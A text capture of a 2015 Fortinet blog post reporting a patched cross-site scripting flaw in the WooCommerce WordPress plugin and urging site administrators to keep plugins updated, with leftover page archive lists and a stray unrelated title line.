Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
Another XSS Vulnerability In a WordPress Plugin_ Is It Time To Worry About WordPress_ _ Fortinet Blog
1. 3/25/2015 Another XSS Vulnerability In a WordPress Plugin? Is It Time To Worry About WordPress? | Fortinet Blog
http://blog.fortinet.com/post/another-xss-vulnerability-in-a-wordpress-plugin-is-it-time-to-worry-about-wordpress 1/4
FortiGuard Services (http://fortinet.com/products/fortiguard/index.html)Fortinet Blog (http://blog.fortinet.com/)Video Library (http://video.fortinet.com)
Resources (http://fortinet.com/resource_center/index.html)
(http://fortinet.com)
Subscribe to All Posts (/feed)
by Chris Dawson (/author/chris-dawson) | March 24, 2015 | Category: Industry Trends & News (/category/industry-trends-news)
Another XSS Vulnerability In a WordPress Plugin? Is It Time To Worry About WordPress?
As FortiGuard Labs discloses another WordPress Plugin XSS vulnerability, it’s time to think about CMS security.
According to W3Techs, WordPress powers nearly 24% of all websites. There is a reason that it enjoys close to a 61% market share among content management systems:
It is incredibly easy to set up and use
It is actively maintained and updated
A huge user community is there for support even if you don’t pay a host or service provider to support it
The ability to easily customize and extend it with plugins, themes, etc. (many of them free and/or open source) is absolutely unparalleled.
Of course, that kind of market share gets a lot of attention from hackers. Find an exploit in WordPress or one of its plugins and you’ve found your way into potentially millions of
websites. Last week, FortiGuard Labs disclosed (http://blog.fortinet.com/post/cross-site-scripting-vulnerability-discovered-in-wordpress-photo-gallery-plugin) a cross-site
scripting (XSS) vulnerability in the most popular photo gallery plugin for WordPress. Today, they’re disclosing another XSS vulnerability, this time in the most popular ecommerce
plugin for the CMS, WooCommerce (https://wordpress.org/plugins/woocommerce/).
In the case of the WooCommerce vulnerability, any website visitor who can place an order can potentially exploit it by entering a particular string in the Order Notes dialog.
Administrators viewing the order are likely to trigger whatever code was injected via the exploit. With over 1 million active installations, WooCommerce is obviously a high-profile
target.
The developer, WooThemes, patched the exploit earlier this month within a day of being notified by FortiGuard. Users of version 2.3.6 and above are already protected. As with
the Photo Gallery vulnerability disclosed last week, though, there is an alarming number of legacy users who haven’t upgraded to the latest version (actually 2.3.7 as of the time of
this writing):
There are many reasons why site administrators don’t upgrade their plugins immediately. In some cases,
upgrades can break third-party extensions or customizations to the plugins. In fact, another WordPress
plugin, Advanced Automatic Updates (https://wordpress.org/plugins/automatic-updater/), which is designed
to automatically update plugins, themes, etc., notes:
While this will be useful for the vast majority of sites, please exercise caution, particularly if you have
any custom themes or plugins running on your site.
More often than not, though, plugins don’t get updated simply because WordPress lends itself to a “set it and forget it” mentality. Get everything working, install the extra bits you
need, and go on about running your business, not worrying about your website. This ease of use and overall reliability is fantastic for WordPress users, but the false sense of
security it creates is a recipe for disaster.
That’s the real message here. You don’t need to stop using WordPress. It isn’t time to dump your website and run for another CMS (or go back to the dark ages of hand coding
websites and building them from scratch). But it’s critical that website administrators be absolutely vigilant about updates to the core CMS and all of their plugins and extensions.
If you’ve customized your WordPress installation (or your install of any CMS for that matter) to the point that updates will break your website, it’s time to rethink your approach.
And if you just don’t check that updates page in the administrator console very often, you should.
ALL SECURITY RESEARCH SECURITY 101 BEHIND THE FIREWALL Q AND A
19 29 21 0Google +
INDUSTRY TRENDS
2. 3/25/2015 Another XSS Vulnerability In a WordPress Plugin? Is It Time To Worry About WordPress? | Fortinet Blog
http://blog.fortinet.com/post/another-xss-vulnerability-in-a-wordpress-plugin-is-it-time-to-worry-about-wordpress 2/4
by Chris Dawson (/author/chris-dawson) | March 24, 2015 | Category: Industry Trends & News (/category/industry-trends-news)
Updates frequently happen before exploits become well-known. Security researchers notify developers very quickly when they discover vulnerabilities and good developers will
respond with immediate updates. The longer these vulnerabilities go unpatched, though, the longer more hackers have to learn about them and exploit them.
Content management systems like WordPress have put professional websites within reach of just about everyone. However, that means that just about everyone needs to start
thinking like a security-savvy sysadmin and keep their website up to date and fully patched. Clearly, hackers are counting on you to forget about that all-important updates page.
Tags: fortiguard labs (/tag/fortiguard-labs) vulnerability (/tag/vulnerability) xss (/tag/xss-1) wordpress (/tag/wordpress-1) wordpress plugins (/tag/wordpress-plugins) w3tech
(/tag/w3tech) woothemes (/tag/woothemes) automatic updates (/tag/automatic-updates) plugins (/tag/plugins)
0 Comments Fortinet Blog Login
Share⤤ Sort by Best
Start the discussion…
Be the first to comment.
Subscribe✉ Add Disqus to your sited Privacy
Recommend
Twitter
(http://www.twitter.com/fortiguardlabs)
Facebook
(https://www.facebook.com/FortiGuard.Labs)
LinkedIn
(http://www.linkedin.com/groups?
gid=1321377&trk=hb_side_g)
Youtube
(http://www.youtube.com/user/SecureNetworks)
2
6
18
16
11
11
20
21
20
16
20
15
25
FortiGuard Labs on the Web
Monthly Archives
January 2015 (/2015/01)
December 2014 (/2014/12)
November 2014 (/2014/11)
October 2014 (/2014/10)
September 2014 (/2014/09)
August 2014 (/2014/08)
July 2014 (/2014/07)
June 2014 (/2014/06)
May 2014 (/2014/05)
April 2014 (/2014/04)
March 2014 (/2014/03)
February 2014 (/2014/02)
January 2014 (/2014/01)
19 29 21 0Google +
3. 3/25/2015 Another XSS Vulnerability In a WordPress Plugin? Is It Time To Worry About WordPress? | Fortinet Blog
http://blog.fortinet.com/post/another-xss-vulnerability-in-a-wordpress-plugin-is-it-time-to-worry-about-wordpress 3/4
10
15
19
19
14
14
2
1
12
11
12
8
7
4
6
7
62
17
14
15
14
11
6
4
6
11
2
2
4
6
6
5
7
5
7
8
11
3
8
4
December 2013 (/2013/12)
November 2013 (/2013/11)
October 2013 (/2013/10)
September 2013 (/2013/09)
August 2013 (/2013/08)
July 2013 (/2013/07)
June 2013 (/2013/06)
April 2013 (/2013/04)
March 2013 (/2013/03)
February 2013 (/2013/02)
January 2013 (/2013/01)
December 2012 (/2012/12)
November 2012 (/2012/11)
October 2012 (/2012/10)
September 2012 (/2012/09)
August 2012 (/2012/08)
July 2012 (/2012/07)
June 2012 (/2012/06)
May 2012 (/2012/05)
April 2012 (/2012/04)
March 2012 (/2012/03)
February 2012 (/2012/02)
January 2012 (/2012/01)
December 2011 (/2011/12)
November 2011 (/2011/11)
October 2011 (/2011/10)
September 2011 (/2011/09)
August 2011 (/2011/08)
July 2011 (/2011/07)
June 2011 (/2011/06)
May 2011 (/2011/05)
April 2011 (/2011/04)
March 2011 (/2011/03)
February 2011 (/2011/02)
January 2011 (/2011/01)
December 2010 (/2010/12)
November 2010 (/2010/11)
October 2010 (/2010/10)
September 2010 (/2010/09)
August 2010 (/2010/08)